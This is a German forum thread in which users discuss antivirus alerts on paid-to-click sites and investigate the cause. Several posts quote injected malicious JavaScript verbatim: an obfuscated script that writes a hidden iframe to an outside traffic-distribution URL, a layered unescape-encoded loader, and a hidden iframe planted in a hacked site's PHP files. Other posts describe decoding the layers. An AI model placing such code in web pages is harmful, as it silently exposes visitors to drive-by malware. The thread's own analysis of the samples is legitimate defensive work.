Vermehrt Scriptviren auf Paid4-Seiten?

M

morpheus1510

Well-known member
ID: 197115
L
20 April 2006
1.371
80
Hi,

seit einigen Tagen fällt mir auf, dass auf verschiedenen Paid4-Seiten immer wieder mein Virenscanner anschlägt, zuletzt gerade eben auf just-cash.de (das soll jetzt kein Anprangern dieses Dienstes sein, nur ist das für den Moment das einzige Beispiel, das ich habe).

Auf diesen Seiten ist immer ein ziemlich verdächtiger JavaScript-Code enthalten:

Code: 
<!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="https://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->

Mein Virenscanner meldet dazu folgendes (immer dasselbe):

HTTP Malicious Toolkit Variant Activity
Zum Vergrößern anklicken....

Angriff erfolgte von www.rezmas.com (210.48.153.232) auf TCP-Port 1651

oder

HTTP Malicious Toolkit Download Activity
Zum Vergrößern anklicken....

Angriff erfolgte von 78.157.142.122 direkt auf TCP-Port 80 (Webserver)

Ich bin mir nicht sicher, ob hier ein Hack der jeweiligen Server vorliegt (aufgrund der Masse eher unwahrscheinlich) oder ob dieser Code evtl. über irgendwelche Werbebanner eingeschleust wird.
Den Betreiber von Just-Cash habe ich bereits informiert.
 
Ich würde ganz klar sagen, das dies an dem Werbebanner
liegt ...

Hatte auch mal probleme, und auf ner BettelSeite nen
gut bezahlten ViewBanner gesetzt.
Und viele Virenprogramme waren darauf angesprungen.

Jetzt muss man wählen zwischen
Besucher oder Verdienst ... (je nachdem was einem wichtiger ist)


MFG Smigolus
_____________
 
smigolus schrieb:
Jetzt muss man wählen zwischen
Besucher oder Verdienst ... (je nachdem was einem wichtiger ist)
Zum Vergrößern anklicken....

Ich denke mal, wenn ich darüber in Kenntnis gesetzt werde, dass über meine Webseite Viren, Trojaner oder ähnliche Dinge verteilt werden, dann habe ich keine andere Wahl als diesen Umstand zu beseitigen.

Andernfalls handele ich mit Vorsatz und darauf wird der betreffende Hoster sicherlich nicht so freudig reagieren. Das kann ja wohl nicht angehen, dass man wegen ein paar Cent Mehrverdienst wissentlich seine ahnungslosen User und Besucher einer solchen Gefahr aussetzt!
 
morpheus1510 schrieb:
Auf diesen Seiten ist immer ein ziemlich verdächtiger JavaScript-Code enthalten:
Zum Vergrößern anklicken....

Hab mal geschaut, dass der Code tut: Er erstellt ein iframe, welches versteckt ist (style="display:none") und welches auf https://bestgreenstreet.com/tds/go.php verweist. Dadrin ist wieder ein selbstentschlüsselndes JavaScript, welches wieder ein selbstentschlüsselndes JavaScript enthält. Ich hab das noch ein paar Stufen weit verfolgt, irgendwann hatte ich keine Lust mehr.

Was auch immer jemand da verstecken will, es soll scheinbar nicht so einfach gefunden werden und man hat recht viel Aufwand getrieben, es zu verstecken.
 
DaPhreak schrieb:
Hab mal geschaut, dass der Code tut: Er erstellt ein iframe, welches versteckt ist (style="display:none") und welches auf https://bestgreenstreet.com/tds/go.php verweist. Dadrin ist wieder ein selbstentschlüsselndes JavaScript, welches wieder ein selbstentschlüsselndes JavaScript enthält. Ich hab das noch ein paar Stufen weit verfolgt, irgendwann hatte ich keine Lust mehr.

Was auch immer jemand da verstecken will, es soll scheinbar nicht so einfach gefunden werden und man hat recht viel Aufwand getrieben, es zu verstecken.
Zum Vergrößern anklicken....

wie verfolgst du das? Würde mich mal interessieren, wer der übeltäter wäre ;)
 
D_Blade schrieb:
wie verfolgst du das? Würde mich mal interessieren, wer der übeltäter wäre ;)
Zum Vergrößern anklicken....

du könntest dir auf deinem pc ne html datei erstellen, die immer wieder den code der seiten ausführt (im prinzip nur das unescape vom JS) schaus dir einfach mal an:ugly:

Infos:

Code: 
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297GMJVEQI%2964wvg%297H%2966lxxt%297E33%7B%7B%7B2vi%7Eqew2gsq3jsvyq3hf3mrhi%7C2tlt%2966%2964%7Bmhxl%297H%29665%2966%2964limklx%297H%29665%2966%2964wx%7Dpi%297H%2966zmwmfmpmx%7D%297Elmhhir%2966%297I%297G3MJVEQI%297I%294H%294E4')</script>

hier werden die ganze %xx unescaped, was wieder einen JS code erzeugt, der wieder escaped ist usw...

wenn du nun:

Code: 
<script language=javascript>unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E');</script>

machst und dir das ausgeben lässt, kannst du damit wieder weitermachen

ACHTUNG: gefährliches halbwissen!8)
 
das dauert ja ewig bis ich ans ziel komme :-S

Jemand bock das zurückzuverfolgen, oder gibts ne möglchkeit auf einfache Weise das zu machen? :-S

Hab so an Tools gedacht^^
 
D_Blade schrieb:
wie verfolgst du das? Würde mich mal interessieren, wer der übeltäter wäre ;)
Zum Vergrößern anklicken....

Jo, habs so ähnlich gemacht, wie Sebmaster sagte. Das JavaScript basiert meistens darauf, dass es mittels document.write() irgendwas in den Quelltext schreibt. Anstatt den das da hinschreiben zu lassen, verändert man das Script so, dass das Javascript an eine "sichere" Stelle ausgegeben wird, also irgendwo wo's nicht ausgeführt wird. Man kann z.B. einfach document.write() durch alert() ersetzen. Oder man lässt JavaScript das in eine Textbox ausgeben.

D_Blade schrieb:
oder gibts ne möglchkeit auf einfache Weise das zu machen? :-S

Hab so an Tools gedacht^^
Zum Vergrößern anklicken....

Schon möglich, dass es dafür Tools gibt. Ich kenn allerdings keins. Obwohl, Firebug hat nen JavaScript-Debugger... ich wollt nur das Script nicht unbedingt bei mir ausführen lassen, wenn's schon 'ne Virenwarnung produziert.
 
DaPhreak schrieb:
Schon möglich, dass es dafür Tools gibt. Ich kenn allerdings keins. Obwohl, Firebug hat nen JavaScript-Debugger... ich wollt nur das Script nicht unbedingt bei mir ausführen lassen, wenn's schon 'ne Virenwarnung produziert.
Zum Vergrößern anklicken....

:think: ne VM wär halt dafür nicht schlecht:ugly:

meinst du man kann die möglichkeit inner schleife laufen lassen, bis es nicht mehr diese menge an % zeichen findet und dann den code ausgeben lassen?
 
Sebmaster schrieb:
meinst du man kann die möglichkeit inner schleife laufen lassen, bis es nicht mehr diese menge an % zeichen findet und dann den code ausgeben lassen?
Zum Vergrößern anklicken....

So einfach isses nicht, weil nicht immer der gleiche Verschlüsselungstrick benutzt wird. In der dritten Ebene hat das JavaScript erst ein JavaScript "ausgepackt", welches eine Funktion enthält, die irgendwie decoded und dann im zweiten Befehl diese Funktion aufgerufen, mit einem Aufrufparameter der 2x decoded wird (einmal beim Funktionsaufruf mit unescape und dann nochmal beim abarbeiten der Funktion).

Also da muss schon einer von Hand ran. Wobei es mit einem Tool was einem die Zwischenschritte abnimmt schon schnell gehen würde, denke ich.
 
Irgendwie hat das Script 'nen Bug.

Hab's noch ein paar Stufen verfolgt: Die letzte die funktioniert ist

https://www.rezmas.com/forum/db/index.php

Beim Aufruf von der wird im Header ein redirect gesendet

Code: 
Location	https://xxx.xxx/

und die URL geht offensichtlich nicht.

Eventuell hat der Verursacher oder jemand anders es auch nur deaktiviert in dem er die tatsächliche URL schnell ausge-x-t hat.

Im Moment ist das Script jedenfalls wirkungslos.
 
Die haben wohl mit allem gerechnet :think:

Wirklich gerissen...

Aber vielleicht können wir sie ja tracen (verfolgen) indem jemand mal den Trojaner-Downloader sich runterladet und beobachtet, mit wem es Kontakt herstellt :-S ?
 
FTP Geknackt schon 5 mal

Hallo

Leider bin ich seit einer Woche auch betroffen von dem Hacker angriff.

Ich habe nun schon 5 mal mein PAsswort geändert (auf 2 Servern). Und beide Server wurden zum gleichenzeitpunkt geknackt. Es wurden Daten herrunter geladen. Es wurden Daten hochgeladen.

iframes eingebaut in JEDER index.php oder home.php Datei.

Ich kann mir auch sehr gut vorstellen das es durch irgend was ausgelöst wird.

Nur durch Was ???

Kann mir jemand weiterthelfen wie ich das Problem schnell beheben kann???


Hier der IFrame Code:

<iframe src="https://c9u.at:8080/ts/in.cgi?pepsi148" width=125 height=125 style="visibility: hidden"></iframe>

hin und wieder werd ich auf https://bestgreenstreet.com weitergeleitet.

Die letzten Zeilen in einer php werden komplett gelöscht.


Ich hoffe hier kann mir jemand helfen.

MFG
Danny
 
Sebmaster schrieb:
Sicherheitslücken im Script, Sicherheitslücken im Server, etc.



Check mal dein Script auf potenzielle Lücken.



Was sollen wir mit dem iFrame-Code?8O
Zum Vergrößern anklicken....

Hi

Bin leider nicht so der Coder oder Programierer das ich das Script auf sichherheitslücken checken könnte.


Ich hab den Code einfach nur mal hier rein kopiert.
Gibt ja wie ich gehört habe einige die das problem haben.

MFG
Danny
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

R
Paid4-Anbieter - Welche Dienste stehen zum Verkauf / zur Abgabe?
Antworten
0
Aufrufe
108
RetroIN
R
geldverdienen84
THX. - Paid4 Umfragen & Standort & Mikro - Handy App
Antworten
1
Aufrufe
4K
geldverdienen84
geldverdienen84
N
Welche Paid4 Dienste vermisst Ihr ?
Antworten
1
Aufrufe
3K
RetroIN
R
geldverdienen84
QMee / Paid4 Umfragen, Cashback, Gaming / Handy App & Webseite / 19.12.23
Antworten
0
Aufrufe
4K
geldverdienen84
geldverdienen84
geldverdienen84
Vypr / Paid4 Produktbewertung / Handy App / 17.11.23
Antworten
0
Aufrufe
4K
geldverdienen84
geldverdienen84
Zurück
Oben